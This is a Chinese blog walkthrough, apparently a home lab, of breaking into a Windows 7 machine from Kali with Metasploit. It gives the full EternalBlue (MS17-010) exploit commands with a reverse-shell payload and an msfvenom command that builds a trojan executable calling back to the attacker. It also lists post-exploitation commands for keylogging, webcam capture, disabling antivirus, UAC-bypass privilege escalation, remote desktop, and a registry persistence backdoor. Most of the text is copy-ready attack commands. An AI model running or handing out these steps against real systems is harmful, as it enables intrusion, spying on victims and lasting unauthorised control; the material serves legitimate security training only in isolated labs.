MS17-010漏洞利用工具系统入侵(实测)shellcode

MS17-010漏洞利用工具系统入侵与ShellCode(实测)

实验环境

角色系统ip
攻击者kali192.168.229.144
被攻击者Windows 7 Home Basic 7601 Service Pack 1 x64192.168.229.150

注意:win7必须安装以上版本一下且为更新漏洞的

第一步:安装环境

win7网址 itelltou

虚拟机

kali

第二步:测试两台虚拟机的互通性

win7 ping kali
在这里插入图片描述

kali ping win7

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MQCMtu2A-1590659137426)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528141102616.png)

第三步:关闭win7防护墙

控制面板->系统和安全->Windows 防火墙->打开或关闭win7防火墙

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Qb9XGsBM-1590659137430)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528141545810.png)

第三步:打开ms 并扫描被攻击机器

进入kali终端 输入msconsole打开ms

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7zUXBueB-1590659137433)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528142005649.png)

输入进入扫描模块

use auxiliary/scanner/smb/smb_ms17_010

注:基本ms命令

更新:msfupdate
帮助:msfconsole -h
启动msf: msfconsole
启动模块:use 模块路径

查看模块参数:show options
配置参数:set 参数名 参数值
运行:run

查看参数

image-20200528143458963.png

设置被攻击者ip

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ZJWMUAIC-1590659137438)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528143543618.png)

run

image-20200528143613973.png

有+号代表扫描成功

攻击漏洞

use exploit/windows/smb/ms17_010_eternalblue
set rhost 被攻击者ip
set payload windows/x64/meterpreter/reverse_tcp
set lhost 攻击者ip
run

在这里插入图片描述

run

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-24paMkEr-1590659137441)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528144110008.png)

成功进入被攻击者命令行界面(非管理员权限)

image-20200528144216904.png

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UdDo1KGd-1590659137443)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528144250938.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-X9VrEWuQ-1590659137444)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528144323998.png)

至此攻击成功


任务二: ShellCode

第一步 制作控制木马

在kali中输入以下命令制作一个windows 木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者ip LPORT=1001 -f exe >cc.exe

第二步 将木马病毒发给被攻击机器

可运用各种手段,此处演示直接从kali本机拷贝到win7

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wJa7K66c-1590659137445)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528151849344.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ExIOZ6nn-1590659137446)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528151902306.png)

第三步:在kali中设置监听

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 攻击者ip
set LPORT 1001
run

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YvqBhE4T-1590659137447)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152100663.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-AceHIPej-1590659137448)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152248328.png)

上图存在一个问题rhost应该为攻击者ip

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a7nGqSta-1590659137449)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152438121.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YlTTPyD9-1590659137450)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152457627.png)

第四部:测试

在win7中双击木马文件

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uX67i6gu-1590659137452)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152833330.png)

然后在kali中查看[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Nl0oN9ha-1590659137453)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152813926.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PcyW7cG0-1590659137454)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152925907.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-P9vTeIvo-1590659137455)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528152948746.png)

Metepreter

收集主机信息

获取系统运行的平台信息
sysinfo
shell -> systeminfo
查看权限 getuid
进入目标机cmd shell
进程相关
查看进程 ps
获取当前进程的pid getpid
切换进程 migrate 进程号
进程迁移:run post/windows/manage/migrate
关闭进程:
run killav
重启/关机 reboot / shutdown
摄像头相关
webcam_list #查看摄像头
webcam_snap #通过摄像头拍照
webcam_stream #通过摄像头开启视频

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-y4MuqCt2-1590659137457)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528153451777.png)

键盘记录

keyscan_start #开始键盘记录
keyscan_dump #导出记录数据
keyscan_stop #结束键盘记录
run post/windows/capture/keylog_recorder 记录键盘输入

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L9Zmf2as-1590659137458)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528153659368.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-V72uuWL3-1590659137459)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528153704884.png)

文件记录

getwd 或者pwd # 查看当前工作目录
cat # 查看文件内容
mkdir #只能在当前目录下创建文件夹
rmdir #只能删除当前目录下文件夹
rm #删除文件
edit #编辑或创建文件 没有的话,会新建文件
upload -r 本机路径 目的机路径# 上传文件到目标机上
download # 下载文件到本机上
execute #在目标机中执行文件
execute -H -i -f cmd.exe # 创建新进程
cmd.exe,-H不可见,-i交互

image-20200528153947324.png

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Pz3hq1wn-1590659137461)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528154015522.png)

文件上传

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oCJ0FM6b-1590659137462)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528171454763.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Enc2Dfr7-1590659137464)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528171524603.png)

进入cmd

shell

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GQjud0E3-1590659137465)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528162010028.png)

提权测试

方法一:getsystem提权失败

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qwMGVzvX-1590659137466)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528163831351.png)

方法二UAC****进行提权
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask

如使用bypassuac.rb脚本:

background
use exploit/windows/local/bypassuac
set SESSION session号码
run

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ICjzlDjb-1590659137467)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528164029623.png)

方法三 可先利用enum_patches模块 收集补丁信息,然后查找可用的exploits进行提权
meterpreter > run post/windows/gather/enum_patches #查看补丁信息
msf > use exploit/windows/local/ms13_053_schlamperei
msf > set SESSION 2
msf > exploit

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tfUDAk5u-1590659137468)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528164635259.png)

远程桌面与截图

enumdesktops  #查看可用的桌面
getdesktop    #获取当前meterpreter 关联的桌面
set_desktop   #设置meterpreter关联的桌面  -h查看帮助
screenshot  #截屏
use espia  #或者使用espia模块截屏  然后输入screengrab
run vnc  #使用vnc远程桌面连接

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4TumzNQ2-1590659137469)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528165653809.png)

run vnc

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hHoOTCat-1590659137470)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528165745087.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-s4un8Muz-1590659137472)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528171735852.png)

这里真的很神奇,很开心!!!

后门植入

方法一 persistence****启动项后门

在C:\Users***\AppData\Local\Temp\目录下,上传一个vbs脚本 在注册表

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项

run persistence –h #查看帮助
run persistence -X -i 5 -p 6661 -r 192.168.0.133
#-X指定启动的方式为开机自启动,-i反向连接的时间间隔(5s) –r 指定攻击者的ip

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-543LlleW-1590659137473)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528173401397.png)

连接后门

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.0.133
msf > set LPORT 6661
msf > exploit

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rjwBQ3KF-1590659137474)(MS17-010漏洞利用工具系统入侵(实测)].assets/image-20200528173419313.png)

指定攻击者的ip

[外链图片转存中...(img-543LlleW-1590659137473)].assets/image-20200528173401397.png)

连接后门

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.0.133
msf > set LPORT 6661
msf > exploit

[外链图片转存中...(img-rjwBQ3KF-1590659137474)].assets/image-20200528173419313.png)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值